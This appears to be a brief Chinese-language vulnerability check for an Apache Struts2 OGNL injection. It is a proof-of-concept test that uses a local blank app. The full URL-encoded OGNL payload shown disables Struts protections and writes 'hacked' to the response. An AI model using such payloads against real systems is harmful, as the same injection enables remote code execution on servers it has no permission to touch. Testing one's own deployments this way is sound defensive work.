No description provided by source.
打开Struts Blank App中的 HelloWorld.jsp增加类似下列代码:
<s:url id="url" action="HelloWorld" includeParams="all">
运行 struts2-blank app
访问下列地址: http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D
如果返回"hacked",则受此漏洞影响